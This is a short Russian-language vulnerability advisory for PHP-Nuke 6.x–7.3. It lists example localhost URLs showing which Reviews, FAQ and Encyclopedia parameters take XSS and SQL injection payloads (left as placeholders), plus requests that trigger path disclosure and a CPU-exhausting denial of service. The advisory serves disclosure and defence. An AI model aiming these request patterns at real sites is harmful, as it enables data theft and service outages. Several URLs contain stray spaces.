Программа: PHP-Nuke 6.x - 7.3 

Обнаружено несколько уязвимостей в PHP-Nuke в модулях Reviews, Encyclopedia, и Faq. Удаленный атакующий может получить доступ к важной информации на сервере.

1. XSS - удаленный атакующий может получить доступ к важной информации пользователей
2. SQL-инъекция в модуле Reviews. Удаленный атакующий может получить доступ к базе данных
3. Раскрытие пути к установочной директории 
4. Удаленный атакующий может заставить систему потреблять большое количество ресурсов процессора, что влечет за собой отказ в обслуживании. 

Примеры: 

1. XSS

http://localhost/nuke73/modules.php? name=FAQ&myfaq=yes&id_cat=1&categories=[xss code here]

http://localhost/nuke73/modules.php? name=Encyclopedia&op=ter ms&eid=1 http://localhost/nuke73/modules.php? name=Encyclopedia&file=search&eid=[xss code here]

http://localhost/nuke73/modules.php? name=Encyclop edia&file=search&query=f00bar&eid=[xss code here]

http://localhost/nuke73/modules.php? name=Encyclopedia&op=content&tid=774
&page=2&query=[xss code here]

http://localhost/nuke73/modules.php?name= Reviews&rop=preview_review&title= 
f001&text=f002&score=9&email=f003@bar. org&reviewer=f00bar&url_title=
foobar&url=[xss code here]

http://localhost/nuke73/modules.php? name=Reviews&rop=preview_review& 
title=f001&text=f002&score=9&email= f003@bar.org&reviewer=f00bar&cover=
[xss code here]

http://localhost/nuke73/modules.php? name=Reviews&rop=preview_review&title=f001 &text=f002&score=9&email=f00@bar.org
&reviewer=f00bar&rlanguage=[xss code here]

http://localhost/nuke73/modules.php? name= Reviews&rop=preview_review&title=f001 &text=f002&score=9&email=f00@bar.
org&reviewer=f00bar&hits=[xss code here]

http://localhost/nuke72/modules.php? name=Reviews&rop=Yes&title=f001&text=f002 &score=9&email=f00@bar.org&
text=f00%253c/textarea>%2m

http://localhost/nuk e73/modules.php? name=Reviews&rop=savecomment&uname=
[xss code here]&id=8&score=9 

2. SQL-инъекция 

http://localhost/nuke73/modules.php? name=Reviews&rop=Q&orde r=[sql injection code here] 

3. Раскрытие пути к установочной директории 

http://localhost/nuke73/modules.php?name= Reviews&rop=preview_review& title=f001&text=f002&score=9&email=
f00@bar.org&reviewer=f00bar&;

http://localhost/nuke7 3/modules.php?name= Reviews&rop=Yes&title=f001&text= f002&score=9&email=f00@
bar.org&reviewer=f00&score=9999 

4. DoS-атака

http://localhost/nuke73/modules.php? name=Reviews&rop=savecomment&id =1&uname= f00bar&score=999999999999999999999999

Оставить мнение